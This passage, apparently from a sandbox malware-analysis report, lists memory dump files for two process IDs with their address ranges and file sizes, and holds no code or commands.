                          3.5MB

                        • memory/3008-147-0x0000000140000000-0x0000000140383000-memory.dmp

                          Filesize

                          3.5MB

                        • memory/3056-161-0x0000000000610000-0x0000000000630000-memory.dmp

                          Filesize

                          128KB

                        • memory/3056-154-0x0000000140000000-0x000000014070A000-memory.dmp

                          Filesize

                          7.0MB

                        • memory/3056-151-0x0000000140000000-0x000000014070A000-memory.dmp

                          Filesize

                          7.0MB

                        • memory/3056-153-0x0000000000110000-0x0000000000124000-memory.dmp

                          Filesize

                          80KB

                        • memory/3056-155-0x0000000140000000-0x000000014070A000-memory.dmp

                          Filesize

                          7.0MB